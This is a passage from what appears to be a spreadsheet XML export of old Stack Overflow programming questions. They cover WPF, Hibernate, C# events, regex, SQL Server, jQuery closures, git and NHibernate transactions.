Adding some background color does make the event to get fired, but after the first drag i get this error: &lt;/p&gt;
&lt;p&gt;"Can only call DragMove when primary mouse button is down"&lt;/p&gt;
&lt;p&gt;Code Snipet: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Private Sub Grid1_MouseLeftButtonDown(ByVal sender As System.Object, ByVal e As System.Windows.Input.MouseButtonEventArgs) Handles Grid1.MouseLeftButtonDown
    DragMove()
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know that this would work fine for a label, but isnt there a way to make it work for a grid? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hibernate and IDs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible in hibernate to have an entity where some IDs are assigned and some are generated?&lt;/p&gt;
&lt;p&gt;For instance:&lt;/p&gt;
&lt;p&gt;Some objects have an ID between 1-10000 that are generated outside of the database; while some entities come in with no ID and need an ID generated by the database.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Blocking and waiting for an event</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It sometimes want to block my thread while waiting for a event to occur.&lt;/p&gt;
&lt;p&gt;I usually do it something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private AutoResetEvent _autoResetEvent = new AutoResetEvent(false);
private void OnEvent(object sender, EventArgs e){
  _autoResetEvent.Set();
}
// ...
button.Click += OnEvent;
try{
  _autoResetEvent.WaitOne();
}
finally{
  button.Click -= OnEvent;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, it seems that this should be something that I could extract to a common class (or perhaps even something that already exists in the framework).&lt;/p&gt;
&lt;p&gt;I would like to be able to do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;EventWaiter ew = new EventWaiter(button.Click);
ew.WaitOne();
EventWaiter ew2 = new EventWaiter(form.Closing);
ew2.WaitOne();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I can't really find a way to construct such a class (I can't find a good valid way to pass the event as an argument). Can anyone help?&lt;/p&gt;
&lt;p&gt;To give an example of why this can be useful, consider something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var status = ShowStatusForm();
status.ShowInsertUsbStick();
bool cancelled = WaitForUsbStickOrCancel();
if(!cancelled){
  status.ShowWritingOnUsbStick();
  WriteOnUsbStick();
  status.AskUserToRemoveUsbStick();
  WaitForUsbStickToBeRemoved();
  status.ShowFinished();
}else{
  status.ShowCancelled();
}
status.WaitUntilUserPressesDone();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is much more concise and readable than the equivalent code written with the logic spread out between many methods. But to implement WaitForUsbStickOrCancel(), WaitForUsbStickToBeRemoved and WaitUntilUserPressesDone() (assume that the we get an event when usb sticks are inserted or removed) I need to reimplement "EventWaiter" each time. Of course you have to be careful to never run this on the GUI-thread, but sometimes that is a worthwhile tradeoff for the simpler code.&lt;/p&gt;
&lt;p&gt;The alternative would look something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var status = ShowStatusForm();
status.ShowInsertUsbStick();
usbHandler.Inserted += OnInserted;
status.Cancel += OnCancel;
//...
void OnInserted(/*..*/){
  usbHandler.Inserted -= OnInserted;
  status.ShowWritingOnUsbStick();
  MethodInvoker mi = () =&amp;gt; WriteOnUsbStick();
  mi.BeginInvoke(WritingDone, null);
}
void WritingDone(/*..*/){
  /* EndInvoke */
  status.AskUserToRemoveUsbStick();
  usbHandler.Removed += OnRemoved;
}
void OnRemoved(/*..*/){
  usbHandler.Removed -= OnRemoved;
  status.ShowFinished();
  status.Done += OnDone;
}
/* etc */
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I find that much harder to read. Admittedly, it is far from always that the flow will be so linear, but when it is, I like the first style.&lt;/p&gt;
&lt;p&gt;It is comparable to using ShowMessage() and Form.ShowDialog() - they also block until some "event" occurs (though they will run a message-loop if they are called on the gui-thread).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I extract all {} tokens from a string using .Net's RegEx?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to extract tokens that are marked with curly brackets from a given string.&lt;/p&gt;
&lt;p&gt;I have tried using Expresso to construct something that will parse...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-------------------------------------------------------------
"{Token1}asdasasd{Token2}asd asdacscadase dfb db {Token3}"
-------------------------------------------------------------
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and produce "Token1", "Token2", "Token3"&lt;/p&gt;
&lt;p&gt;I tried using..&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-------------------------------------------------------------
({.+})
-------------------------------------------------------------
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...but that seemed to match the entire expression.&lt;/p&gt;
&lt;p&gt;Any thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Least used delimiter character in normal text &lt; ASCII 128</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For coding reasons which would horrify you (I'm too embarrassed to say), I need to store a number of text items in a single string.&lt;/p&gt;
&lt;p&gt;I will delimit them using a character.&lt;/p&gt;
&lt;p&gt;Which character is best to use for this, i.e. which character is the least likely to appear in text? Must be printable and probably less than 128 in ASCII to avoid locale issues.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to display an image in flex with Content-Type: image/jpeg?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an .aspx page that generates thumbnails.  It takes an ID and returns an image with response Content-Type: image/jpeg.&lt;/p&gt;
&lt;p&gt;How do I display this image in Flex? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Audio file tagging (read/write) library?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;TagLib seems like a good choice, but I don't use C++ and bindings for other languages are limited. Currently I use the ATL library, but it hasn't been maintained since 2005 and I'm having a hard time doing this myself. So I'm looking for another open source alternative that is actively developed. Do you know of one?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server 2008 Backup Compression Standard Edition</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to backup a database in SQL Server 2008 and have the database compressed using the new compression feature. However, when I run the following code, I get a weird error message:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Backup Database &amp;lt;Database&amp;gt; To Disk 'C:\Backup' With Compression
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get this error message:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Backup Database With Compression is not supported on Standard Edition&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Does this mean I have to upgrade to the full version or is there a way to enable compression in standard edition?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to execute COM+ libraries from Java using a free method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a COM+ component developed with VB6.&lt;/p&gt;
&lt;p&gt;After registering it with the component services manager COM+ application, I can use it from ASP like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Set Comando = Server.CreateObject("JuiciosComando.clsComando")
ComandoExecute = Comando.execute(Xml)
Set Comando = Nothing
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That's all I need, the component just receives a (maybe a huge) string and returns another (also possibly huge) string...&lt;/p&gt;
&lt;p&gt;Is there some way to access this very same component from Java?&lt;/p&gt;
&lt;p&gt;What I've found so far is &lt;a href="http://j-integra.intrinsyc.com/support/com/doc/servlet_com/ServletToComPlusExample.html" rel="nofollow"&gt;J-Integra&lt;/a&gt; but it's a commercial product.&lt;/p&gt;
&lt;p&gt;I've also found &lt;a href="http://www.codeguru.com/forum/archive/index.php/t-383429.html" rel="nofollow"&gt;this thread on codeguru.com&lt;/a&gt; but my C++.NET knowledge is rather poor, besides I would rather just find a free, pure Java solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Making your javascript maintainable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am in the process of converting an internal application to use more Ajax via jQuery. I am moving away from the standard code behind of the current ASP.NET application and incorporating JavaScript methods that are going to run client side. My concern is what is the best method for allowing this application to stay maintainable for those who come behind me. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the security implications of not closing connection to the database after you are done with it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What security issues can arise from not closing the database connection after using it?  Doesn't PHP automatically close it once a new page loads?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to display a windows/X window system window in 3d space on texture?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm wondering, how can I catch a window and display it on texture in 3D space. And how can I redirect mouse and keyboard input from 3D application to application running in background? I mean full 3D desktop.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which .NET data structure should I use?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here is the structure of the data my object will need to expose (the data is NOT really stored in XML, it was just the easiest way to illustrate the layout):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Department id="Accounting"&amp;gt;
  &amp;lt;Employee id="1234"&amp;gt;Joe Jones&amp;lt;/Employee&amp;gt;
  &amp;lt;Employee id="5678"&amp;gt;Steve Smith&amp;lt;/Employee&amp;gt;
&amp;lt;/Department&amp;gt;
&amp;lt;Department id="Marketing"&amp;gt;
  &amp;lt;Employee id="3223"&amp;gt;Kate Connors&amp;lt;/Employee&amp;gt;
  &amp;lt;Employee id="3218"&amp;gt;Noble Washington&amp;lt;/Employee&amp;gt;
  &amp;lt;Employee id="3233"&amp;gt;James Thomas&amp;lt;/Employee&amp;gt;
&amp;lt;/Department&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I de-serialize the data, how should I expose it in terms of properties on my object?  If it were just Department and EmployeeID, I think I'd use a dictionary.  But I also need to associate the EmployeeName, too.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Interacting With Java Applet</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know if it is possible to interact with a java applet via .net?&lt;/p&gt;
&lt;p&gt;Edit: I was able to use the UI Automation framework to locate the java applet, and from there use OCR to read data and simulate mouse/keyboard input into the applet.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery and closure</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a multiple menu's on my page which all use the same mouseover and click events, so I decided to get it into a function. However vars seem to always be assigned to the last of the arguments for the hover(function, function) function.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(document).ready( function() {
menuMouseOver = function() {
    for(i=0, u=arguments.length; i&amp;lt;u; i++){
        var parent = arguments[i].parent;
        var active = arguments[i].active;
        var childSelect = arguments[i].childSelect;
        console.log(active); //logs the correct active
            $(parent).children(childSelect)
                .not('.'+active).each( function(i, e) {console.log(active);})
 //The above console.log logs the correct active 
                    .hover( function() {
                            console.log(active); //this one always logs menu2_active
                            $(this).addClass(active);
                        }, function() {
                            $(this).removeClass(active);
                        });
    }
}
menuMouseOver( { parent: '#menu1',
                active: 'menu1_active',
                childSelect: ':gt(0)'},
            { parent: '#menu2',
                active: 'menu2_active',
                childSelect: ':gt(0)'});
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why is is that the last console.log will always logs the last &lt;em&gt;active&lt;/em&gt; instead of the one that belongs to arguments[i].active. (In this example it always logs the &lt;em&gt;active&lt;/em&gt; of arguments[1].active)
What am I doing wrong?   &lt;/p&gt;
&lt;p&gt;Also, the real function is more complex, but the problem is also present in this variant.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get the values of the parameters of a calling method?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;Question&lt;/h2&gt;
&lt;p&gt;I'm writing some code that needs to be able to get the &lt;strong&gt;values&lt;/strong&gt; of the parameters from the method that called into the class. I know how to get all the way to the ParameterInfo[] array, but I don't know how to then get the values. Is this even possible?&lt;/p&gt;
&lt;p&gt;If it is, I think it has something to do with using the MethodBody property from the MethodInfo object, which allows you to inspect the IL stream, including properties, but I don't know how to do it, and I haven't found applicable code on Google.&lt;/p&gt;
&lt;h2&gt;Code&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;// Finds calling method from class that called into this one
public class SomeClass
{
    public static void FindMethod()
    {
        for (int i = 1; i &amp;lt; frameCount; i++)
        {
            var frame = new StackFrame(i);
            var methodInfo = frame.GetMethod();
            if (methodInfo.DeclaringType != this.GetType())
            {
                string methodName = frame.GetMethod().Name;
                var paramInfos = methodInfo.GetParameters();
                // Now what?? How do I get the values from the paramInfos
                break;
            }
            else if (i == frameCount - 1)
            {
                throw new TransportException("Couldn't find method name");
            }
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to split a string while preserving line endings?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a block of text and I want to get its lines &lt;strong&gt;without&lt;/strong&gt; losing the \r and \n at the end. Right now, I have the following (suboptimal code):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string[] lines = tbIn.Text.Split('\n')
                     .Select(t =&amp;gt; t.Replace("\r", "\r\n")).ToArray();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So I'm wondering - is there a better way to do it?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Accepted answer&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string[] lines =  Regex.Split(tbIn.Text, @"(?&amp;lt;=\r\n)(?!$)");
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>jquery $.ajax function call is slow first time</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using $.ajax to update some values in the database. when the page makes the ajax call for the first time, it is slow. it is taking like 5 or 6 seconds to return the result. after the first request, it is fast. I am not sure if there is a way to make the first call also fast. if you have any ideas, please let me know.&lt;/p&gt;
&lt;p&gt;Thanks,
sridhar&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery vs MicrosoftAjax in ASP.NET MVC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Under what circumstances would you use MicrosoftAjax over jQuery in an ASP.NET MVC application?&lt;/p&gt;
&lt;p&gt;According to Scott Cate in this podcast &lt;a href="http://www.hanselminutes.com/default.aspx?showID=146"&gt;Object Oriented AJAX with Scott Cate&lt;/a&gt; MicrosoftAjax is good for sending and retrieving data to and from the server. And jQuery is good for manipulating your data via the DOM once it arrives at the client. Yet, with a simple form plugin for jQuery you can send and retrieve data with jQuery quite easily. Often with a single line of code.&lt;/p&gt;
&lt;p&gt;So I'm wondering what the difference is between MicrosoftAjax and jQuery within ASP.NET MVC?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>python: restarting a loop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for i in range(2,n):
    if(something):
       do something
    else:
       do something else
       i = 2 **restart the loop
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that doesn't seem to work. Is there a way to restart that loop? &lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server: Server-side blob cursor?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i'd like to read binary data from a blob, using the Stream interface around it.&lt;/p&gt;
&lt;p&gt;But i don't want the blob to have to be loaded entirely client side and stored in memory, or in a file. &lt;/p&gt;
&lt;p&gt;i want the code that uses the blob to be able to seek and read, and only as much data that is needed to support seek/read is brought over the wire.&lt;/p&gt;
&lt;p&gt;i.e. &lt;strong&gt;&lt;em&gt;Pretend&lt;/em&gt;&lt;/strong&gt; the blob is a 250MB Photoshop image. The thumbnailer code knows how to read the first 8 bytes of an image, recognize it's a PSD file, seek to the offset that will contain the 3k thumbnail, and read that.&lt;/p&gt;
&lt;p&gt;So rather than trying to allocate 250MB of memory, or having to create a temporary file, and having to wait for 250MB to be brought over the wire: the hypothetical SQLServerBlobStreamServerCursor class knows how to data traffic to what which is actually asked for.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;Research&lt;/h2&gt;
&lt;p&gt;&lt;a href="http://support.microsoft.com/kb/317034" rel="nofollow"&gt;HOW TO: Read and Write a File to and from a BLOB Column by Using Chunking in ADO.NET and Visual Basic .NET&lt;/a&gt;
Which talks about being able to read, and write, in chunks. But the code is unreadable being cut off like that i can't stand it. i'll look at it later.&lt;/p&gt;
&lt;p&gt;Also &lt;a href="http://stackoverflow.com/questions/252517/streaming-directly-to-a-database/252526#252526"&gt;this guy&lt;/a&gt; mentioned a new SQL Server 2005 [&lt;em&gt;column&lt;/em&gt;.Write()]3 T-SQL syntax to write data - &lt;a href="http://weblogs.asp.net/alessandro/archive/2008/09/22/conserving-resources-when-writing-blob-values-to-sql-server-and-streaming-blob-values-back-to-the-client.aspx" rel="nofollow"&gt;could be used to write data in small chunks&lt;/a&gt; (to avoid consuming all your server's memory). Maybe there's a [&lt;em&gt;column&lt;/em&gt;].&lt;strong&gt;Read&lt;/strong&gt;() pseudo-method&lt;/p&gt;
&lt;p&gt;Microsoft has an article: &lt;a href="http://msdn.microsoft.com/en-us/library/3517w44b(VS.80).aspx" rel="nofollow"&gt;Conserving Resources When Writing BLOB Values to SQL Server&lt;/a&gt;  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to PRINT a message from SQL CLR function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an equivalent of&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PRINT 'hello world'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which can be called from CLR (C#) code?&lt;/p&gt;
&lt;p&gt;I'm trying to output some debug information in my function. I can't run the VS debugger because this is a remote server.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I configure Subversion 1.5 support in Xcode?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;According to the release notes for the iPhone 2.2.1, SDK Xcode now officially supports Subversion 1.5. I've converted my working copy to use the new 1.5 format; however, Xcode now will no longer track changes.  I'm guessing there is somewhere in Xcode that I have to tell it to use the 1.5 format. Has anyone found it yet?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regex to strip lat/long from a string</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone have a regex to strip lat/long from a string? such as:&lt;/p&gt;
&lt;p&gt;ID: 39.825 -86.88333&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Domain Model - Identifier Relationships vs. Hierarchal Objects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While fleshing out a hypothetical domain model, I have found myself wondering whether the better approach in relating domain objects would be to have a parent domain object contain a pointer (the identifier of the child) or if it would be a better approach to use the child objects to build a composite within the parent object.&lt;/p&gt;
&lt;p&gt;I can see the pros and cons of each approach, mostly a trade off of size versus complexity, being what it boils down to.  I would tend to lean more towards a identifier relationship approach, as I am not anticipating the need for doing any sort of lazy loading.&lt;/p&gt;
&lt;p&gt;Although not directly related, the domain objects are simple POCOs (.NET-equivalent of POJOs).  They are explicitly marked as serializable, as there is a good chance that they will eventually cross between application domains.  LINQ makes the relational identifier approach viable, in my opinion, and I would not consider it at all if LINQ were not available.&lt;/p&gt;
&lt;p&gt;Any thoughts would be appreciated!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit: A couple of more thoughts that might have me lean towards an identifier-only approach.  First would be that the caching policy of the objects.  It is entirely possible that a parent and child object have different TTLs, as defined by their policies.  The second would be that the reference holding might limit object reuse, in that the same child might be held by multiple parents - in the case of reusable data.  Both of these also relate to the overall size of the serialized objects, as well.&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating XML in C++ Code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my project there are situations where we have to send xml messages (as char *) among modules. They are not really large ones, just 10-15 lines. Right now everybody just creates the string themselves. I dont think this is the right approach. We are already using xerces DOM library. So why not create a Dom tree, serialize it, and then send it.&lt;/p&gt;
&lt;p&gt;What do you guys suggest?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linux cross-compilation for ARM architecture</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am interested in cross-compiling a Linux kernel for an ARM target on a x86 host. Are there some good practices you recommend? Which is the best cross-compile suite in your opinion?
Have you settled up a custom cross-compile environment? If yes, what advices do you have? Is it a good idea?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does anyone know any gems/plugins/tutorials related to exporting events to iCal, Google Calendar, Outlook from a Rails application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to figure out if there is already a plug in that does the interaction with iCal, Google APIs that I can use or do I need to just get my hands dirty and write it myself. &lt;/p&gt;
&lt;p&gt;If anyone knows of good resources that I can look at that could help me with the implementation, that would be good as well. &lt;/p&gt;
&lt;p&gt;I am new to RoR and I have been trying to learn it for a while. I finally decided to just start playing with my own application rather than just following a book. &lt;/p&gt;
&lt;p&gt;Any help in this matter would be appreciated. &lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why no compiler error for main() without a return at the end?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a C-brain teaser:  Write the standard Hello-World program, without semi-colons.&lt;/p&gt;
&lt;p&gt;My best answer so far is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int main(void)
{
    if (printf("Hello World!\n"), exit(0), 0)
    {
        /* do nothing */
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I don't understand why I don't get compiler error (Visual Studio):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;error C4716: 'main' : must return a value
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried other functions with a return-type declared, but missing a return-statement, and get this compiler error.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Note that I've also tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int foo(void)
{
    if (printf("Hello World!\n"), exit(0), true)
    {
        /* do nothing */
    }
}
int main(void)
{
    foo();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And don't get a compiler error on foo.  If I remove the "exit(0)", I &lt;em&gt;do&lt;/em&gt; get the compiler error.  Apparently the compiler has knowledge that "exit" is a special function?  This seems very odd to me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>amending a single file in a past commit in git</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to fix a file in past commit. This might affect all ascending commits.&lt;/p&gt;
&lt;p&gt;Is there an easy way to do that? Can you give me a guideline of how to do that?&lt;/p&gt;
&lt;p&gt;Many times when I commit twice I find that I've had error in the first commit, and I wish to fix the error without having to 'git reset' my last good commit.&lt;/p&gt;
&lt;p&gt;For clarification. I want to change the actual &lt;em&gt;commit&lt;/em&gt;, that is, I want the content of the past commit to be changed. IOW I want to &lt;strong&gt;change history!&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Convince Programming Team to Let Go of Old Ways?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is more of a business-oriented programming question that I can't seem to figure out how to resolve.  I work with a team of programmers who have been working with BASIC for over 20 years.  I was brought in to help write the same software in .NET, only with updates and modern practices.  The problem is that I can't seem to get any of the other 3 team members(all BASIC programmers, though one does .NET now as well) to understand how to correctly do a relational database.  Here's the thing they won't understand:&lt;/p&gt;
&lt;p&gt;We basically have a transaction that keeps track of a customer's tag information.  We need to be able to track current transactions and past transactions.  In the old system, a flat-file database was used that had one table that contained records with the basic current transaction of the customer, and another transaction that contained all the previous transactions of the customer along with important money information.  To prevent redundancy, they would overwrite the current transaction with the history transactions-(the history file was updated first, then the current one.)  It's totally unneccessary since you only need one transaction table, but my supervisor or any of my other two co-workers can't seem to understand this.  How exactly can I convince them to see the light so that we won't have to do ridiculous amounts of work and end up hitting the datatabse too many times?  Thanks for the input!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting a string to a class name</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a string variable that represents the name of a custom class. Example: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string s = "Customer";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I will need to create an arraylist of customers. So, the syntax needed is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;List&amp;lt;Customer&amp;gt; cust = new .. 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I convert the string s to be able to create this arraylist on runtime?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does my service reference only generate asynchronous methods?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Service Reference (not a web reference) in VS2008 to a web service that I did not write. The reference works, but only asynchronous versions of each method are available for me to use.&lt;/p&gt;
&lt;p&gt;In the "Configure Service Reference" dialog, the "Generate asynchronous operations" is checked and grayed out.  First of all, I thought checking this box generated async methods in addition to, not instead of, blocking methods.  Second, I've never seen it grayed out before.&lt;/p&gt;
&lt;p&gt;I have experience writing both sides of both WCF and ASMX-era web services and have never seen this before.  What could be causing this?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Browser Detection in HttpModule</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to detect what browser the request is made in the HttpModule?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you convert a url to a virtual path in asp.net without manual string parsing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've seen similar questions and answers regarding conversions from virtual to absolute and url, but how can I convert a url to a virtual path without manual string parsing?&lt;/p&gt;
&lt;p&gt;Example: &lt;/p&gt;
&lt;p&gt;I want "http://myserver/home.aspx" converted to: "~/home.aspx"&lt;/p&gt;
&lt;p&gt;I realize the above example would be an easy string parsing routine, but I'm looking for a proper solution that will scale to the changing of the url format.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>fread example from C++ Reference</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I often use the website www.cplusplus.com as a reference when writing C code.&lt;/p&gt;
&lt;p&gt;I was reading the example cited on the page for &lt;a href="http://www.cplusplus.com/reference/clibrary/cstdio/fread.html" rel="nofollow"&gt;fread&lt;/a&gt; and had a question.&lt;/p&gt;
&lt;p&gt;As an example they post:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/* fread example: read a complete file */
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
int main () {
  FILE * pFile;
  long lSize;
  char * buffer;
  size_t result;
  pFile = fopen ( "myfile.bin" , "rb" );
  if (pFile==NULL) {fputs ("File error",stderr); exit (1);}
  // obtain file size:
  fseek (pFile , 0 , SEEK_END);
  lSize = ftell (pFile);
  rewind (pFile);
  // allocate memory to contain the whole file:
  buffer = (char*) malloc (sizeof(char)*lSize);
  if (buffer == NULL) {fputs ("Memory error",stderr); exit (2);}
  // copy the file into the buffer:
  result = fread (buffer,1,lSize,pFile);
  if (result != lSize) {fputs ("Reading error",stderr); exit (3);}
  /* the whole file is now loaded in the memory buffer. */
  // terminate
  fclose (pFile);
  free (buffer);
  return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It seems to me that that if result != lSize, then free(buffer) will never get called.  Would this be a memory leak in this example?  &lt;/p&gt;
&lt;p&gt;I have always thought the examples on their site are of a very high quality.  Perhaps I am not understanding correctly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Nhibernate: Handling an ITransaction Exception So That New Transactions Can Continue with same ISession</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a list of 10 data objects that I want to insert/update to the database using NHibernate. If one throws an exception (say a primary key violation) I want to still insert/update the other 9. I rolled each object operation into its own atomic transaction, and roll back the transaction if there is an exception. Problem is that if a transaction does cause an exception and is rolled back, on the next transaction Nhibernate complains with the error: null id in Nexus.Data.PortfolioCorporateEntity entry &lt;strong&gt;(don't flush the Session after an exception occurs)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;My main program is simple. It creates a session from a sessionfactory, creates the data access layer, does some work on the data objects and then tries to persist those data objects to the database.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    sessionsManager = new NHibernateSessionManager();
        session = sessionsManager.GetSession();
        DALC = new NHibernateDataProvider(session);
        â€¦
        foreach (var pce in pces)
        {
            try
            {
                DALC.UpdateOrAddObject&amp;lt;PortfolioCorporateEntity&amp;gt;(pce);
            }
            catch (Exception ex)
            {
                Console.WriteLine("Could not add Corporate Entity ID " + pce.CorporateEntity.CorporateEntityID.ToString());
            }
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the updateOrAdd procedure in my Nhibernate Data Access Layer, called 10 times for 10 objects.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void UpdateOrAddObject&amp;lt;T&amp;gt;(T workObject) 
{ 
    using (ITransaction tx = mSession.BeginTransaction) { 
        try { 
            mSession.SaveOrUpdate(workObject); 
            mSession.Flush(); 
            tx.Commit(); 
        } 
        catch (Exception ex) { 
            tx.Rollback(); 
            throw;
        } 
    } 
} 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Just to make the point clear, the session is instantiated by the calling program and passed to the Data Access Layer object, constructor of which is below.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public NHibernateDataProvider(ISession session) 
{ 
    mSession = session; 
} 
&lt;/code&gt;&lt;/pre&gt;
